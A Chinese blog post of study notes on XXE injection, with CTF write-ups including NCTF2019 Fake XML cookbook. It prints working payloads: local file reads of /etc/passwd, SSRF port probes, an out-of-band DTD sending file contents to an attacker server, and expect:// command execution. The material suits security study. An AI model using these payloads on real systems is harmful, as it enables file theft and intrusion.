xml实体注入

最新推荐文章于 2024-05-12 08:17:29 发布
最新推荐文章于 2024-05-12 08:17:29 发布
阅读量427 收藏 1
点赞数
分类专栏: web 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54515836/article/details/113488907
版权

xml实体注入

XXE漏洞即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。

- XML被设计为传输和存储数据,其焦点是数据的内容。

- HTML被设计用来显示数据,其焦点是数据的外观。

&lt &gt &amp &apos &quot` 替换 < > & ' "

基本利用

攻击者会将payload注入XML文件中,一旦文件被执行,将会读取服务器上的本地文件,并对内网发起访问扫描内部网络端口。XXE是一种从本地到达各种服务的方法。此外,在一定程度上这也可能帮助攻击者绕过防火墙规则过滤或身份验证检查。

端口扫描

通过URI将请求指向了/etc/passwd文件,并最终成功的为我们返回了文件中的内容。除此之外,我们也可以使用http URI并强制服务器向我们指定的端点和端口发送GET请求,将XXE转换为SSRF(服务器端请求伪造)。

<?xml version="1.0"?>
<!DOCTYPE GVI [<!ENTITY xxe SYSTEM "http://127.0.0.1:8080" >]>
<catalog>
   <core id="test101">
      <author>John, Doe</author>
      <title>I love XML</title>
      <category>Computers</category>
      <price>9.99</price>
      <date>2018-10-01</date>
      <description>&xxe;</description>
   </core>
</catalog>

通过响应时间长度,判断端口是否开启

通过dtd窃取文件

外部文档类型定义(DTD)文件可被用于触发OOB XXE。攻击者将.dtd文件托管在VPS上,使远程易受攻击的服务器获取该文件并执行其中的恶意命令。

<?xml version="1.0"?>
<!DOCTYPE data SYSTEM "http://ATTACKERSERVER.com/xxe_file.dtd">
<catalog>
   <core id="test101">
      <description>&xxe;</description>
   </core>
</catalog>

上述代码一旦由易受攻击的服务器处理,就会向我们的远程服务器发送请求,查找包含我们的payload的DTD

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY xxe SYSTEM 'http://ATTACKESERVER.com/?%file;'>">
%all;

有两个请求被发送到了我们的服务器,第二个请求为/etc/passwd文件的内容。

在我们的VPS日志中我们可以看到,带有文件内容的第二个请求,以此我们也确认了OOB XXE漏洞的存在:

http://ATTACKERSERVER.com/?daemon%3Ax%3A1%3A1%3Adaemon%3A%2Fusr%2Fsbin%3A%2Fbin%2Fsh%0Abin%3Ax%3A2%3A2%3Abin%3A%2Fbin%3A%2Fbin%2Fsh

web4_观心

<?xml version="1.0" encoding="utf-8"?> 

<!DOCTYPE test [ 

<!ENTITY % remote SYSTEM "http://ip/test/test.dtd"> 

%remote; ]>

<!ENTITY % p1 SYSTEM "php://filter/read=convert-base64.encode/resource=/flag.txt">
<!ENTITY % p2 "<!ENTITY xxe SYSTEM 'http://ip/test/pass=%p1;'>">
%p2;

远程代码执行

这种情况很少发生,但有些情况下攻击者能够通过XXE执行代码,这主要是由于配置不当/开发内部应用导致的。如果我们足够幸运,并且PHP expect模块被加载到了易受攻击的系统或处理XML的内部应用程序上,那么我们就可以执行如下的命令:

<?xml version="1.0"?>
<!DOCTYPE GVI [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<catalog>
   <core id="test101">
      <author>John, Doe</author>
      <title>I love XML</title>
      <category>Computers</category>
      <price>9.99</price>
      <date>2018-10-01</date>
      <description>&xxe;</description>
   </core>
</catalog>

响应

{"error": "no results for description uid=0(root) gid=0(root) groups=0(root)...

[NCTF2019]Fake XML cookbook

简要来讲就是客户端向服务器发送了XML数据,这个数据能被我们控制,这样我们就可以增加一个恶意的外部实体,实现攻击

这里看到username和password都是xml格式,接下来增加我们自己的恶意实体,读取/etc/passwd文件

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///etc/passwd">
  ]>
<user><username>&admin;</username><password>123456</password></user>

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>123456</password></user>

还可以查询存活的主机,然后爆破主机,可以发现flag

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE note [
  <!ENTITY admin SYSTEM "http:123.1231.12312.123">
  ]>
<user><username>&admin;</username><password>123456</password></user>

分享一下我的xml实体注入笔记

HoAd's blog
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XML外部实体注入——XXE漏洞详解
Gefangenes的博客
07-02 2071
首先要了解什么是XXE漏洞,首先应该了解一下什么是XMLXML(可扩展标记语言,英文全称:eXtensible Markup Language)是一种用于描述数据结构和交换数据的标记语言。XML是一种非常灵活的语言,可以用于描述各种类型的数据,如文档、图像、音频、视频等。这个解释太官方,我们可以将xml语言和html对比着再来解释一下1>xml仅仅是纯文本,他不会做任何事情2>xml可以自己发明标签(允许定义自己的标签和文档结构)3>专门用来存放传输数据的东西。
XXE(XML外部实体注入)学习
Goodric的博客
02-16 408
XXE漏洞 XML外部实体注入XML External Entity),简称 XXE 漏洞。 XML是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 XML 文档结构包括 XML 声明、DTD文档类型定义、文档元素。 DTD (Document Type Definition,文档类型定义),用来为 XML 文档定义语法约束。 攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题。 即服务端接收
深入浅出带你了解XML实体注入
最新发布
dzqxwzoe的博客
05-12 1024
Xml外部实体注入漏洞(XML External Entity Injection)简称XXE,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可以构造加载恶意外部文件,进而通过恶意外部文件对服务器进行攻击。今天比较详细的讲了XXE漏洞的原理以及应用方法,有兴趣的小伙伴可以自己去搭建靶机来进行测试,喜欢的小伙伴不妨一键三连。## 题外话初入计算机行业的人或者大学计算机相关专业毕业生,很多因缺少实战经验,就业处处碰壁。
[NCTF2019]Fake XML cookbook
missht0的博客
01-26 93
[NCTF2019]Fake XML cookbook xml实体注入,原理参考https://www.freebuf.com/vuls/175451.html 先抓包 添加恶意实体,读取/etc/passwd文件 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///etc/passwd"> ]> <user><userna
XML实体--ENTITY
李逍遥的专栏
12-11 7503
ENTITY 实体在一个甚至多个XML文档中频繁使用某一条数据,我们可以预先定义一个这条数据的“别名”,即一个ENTITY,然后在这些文档中需要该数据的地方调用它。XML定义了两种类型的ENTITY,一种在XML文档中使用,另一种作为参数在DTD文件中使用。ENTITY的定义语法:]>定义好的ENTITY在文档中通过“&实体名;”来使用。例:booklist_a.xmlxml versio
XML中的entity的用法
weixin_33862514的博客
01-03 506
entity翻译为"实体"。它的作用类似word中的"宏",也可以理解为DW中的摸板,你可以预先定义一个entity,然后在一个文档中多次调用,或者在多个文档中调用同一个entityentity可以包含字符,文字等等,使用entity的好处在于:1.它可以减少差错,文档中多个相同的部分只需要输入一遍就可以了。2.它提高维护效率。比如你有40个文档都包含copyrig...
XML注入学习
xujunhui222的博客
02-10 6711
一、什么是XML注入 XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据 XML 标签没有被预定义。您需要自行定义标签。 XML 被设计为具有自我描述性。 XML 是 W3C 的推荐标准 简单来说xml就是用来存储数据的。 二、XML的特点 XML仅仅是纯文本,他不会做任何事情。 XML可以自己发明标签(允许定义自己的标签和文档结构) 三、XML的定义 首先是XML声明,然后是DTD
XML 注入
发哥微课堂
06-15 8011
0x00:简介 首先先简单的说一下 xml,看一下它的全名称,叫 Xtensible Markup Language,即可扩展的标记语言,可直接理解为内容可自定义扩展,标签可自定义扩展。其实就是一个文本格式的文件,以 xml 结尾,里面的标签内容可以自定义。它具有很清晰的层次结构,便于阅读,经常被用来做配置文件和存储数据。web 中用 xml 格式来传输数据和处理的功能也有很多。而后端没有对 x...
XML学习笔记之文档类型定义(DTD) 和实体ENTITY
Just Do It
06-24 6547
文档类型定义  (document type definition )DTD是规范的一部分。1 为何需要DTDxml文件不仅遵循xml的语法规则,而且受到dtd的约束DTD的优越性:正式而精确的定义词汇表。DTD的作用:将你掌握的知识提供给程序,同时获得文件资料。只需要使用DTD和验证有效性的解析器,文档语法、词汇表以及指定值中的任何错误都逃不过解析器的眼镜。2 编写DTD :通用原则
XXE漏洞常见利用点总结
记录学习,一起进步
02-02 930
XXE漏洞常见利用点总结
XML外部实体注入总结(XXE靶机复现)
Aiwin的博客
05-15 5317
XML外部实体注入,Vuln-XXE靶机复现和无回显XXE的使用
基于XML注入
欢迎阅读我的博客
03-18 393
准备一个UserDao类和UserService类 , 其中 UserService类中有UserDao类型的属性 注入外部Bean(常用) 注入外部Bean的方式:在外部注册一个bean, 然后通过外部bean的id配合property标签的ref引用属性进行注入 注入内部Bean(了解) 注入内部Bean的方式:在bean标签中嵌套bean标签 , 内部bean的id是没有用的 , 不能通过容器被获取到所以不用写id set 注入的核心实现原理 set注入是基于set方法实现的,底层会通过反射机制调用属
XML 外部实体注入
2201_75370376的博客
06-22 936
SQL注入是一种web安全漏洞,使攻击者干扰应用程序对其数据库的查询。它通常使攻击者可以查看他们无法检索的数据。这可能包括属于其他用户的数据,或应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除这些数据,从而导致应用程序的数据发生不正常更改。在某些情况下,攻击者可以逐步扩大SQL注入攻击,以危害底层服务器或其他后端基础设施。
XML外部实体注入(XXE)的原理和应用
iczfy585的博客
08-27 5670
文章目录XXE注入一、XML简介二、XML实体三、CTF中XEE攻击 XXE注入 XXE注入全称是xml external entity 注入,也就是xml外部实体注入。XXE漏洞发生在应用程序解析输入的XML时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取,命令执行等攻击。 一、XML简介 XML是一种用户自定义的标记语言,主要用于数据的存储和传输。XML文档有自己的一个格式规范。是由DTD(document type define)来控制的。例如: <?xml version=
【burpsuite安全练兵场-服务端10】XML外部实体注入(XXE注入)-9个实验(全)
01-11 8057
【BP靶场portswigger-服务端10-XML外部实体注入(XXE注入)】9个实验-万文详细步骤
Web安全测试(四):XML注入和代码注入
ml202187的博客
08-29 994
**通过本章节,我们会学到:** 1. XML注入概念 2. 了解什么是XML注入漏洞 3. 了解XML注入漏洞产生的原因 4. XML注入漏洞检测与防护 5. 掌握XML注入漏洞的利用方式 6. 掌握如何修复XML注入漏洞 7. 代码注入概念 8. 代码注入的类型及防御
Spring——Bean管理-xml方式进行属性注入
一起加油吧~
03-04 2071
Spring中bean管理使用xml方式进行属性注入的7种方式

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

HoAd's blog

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值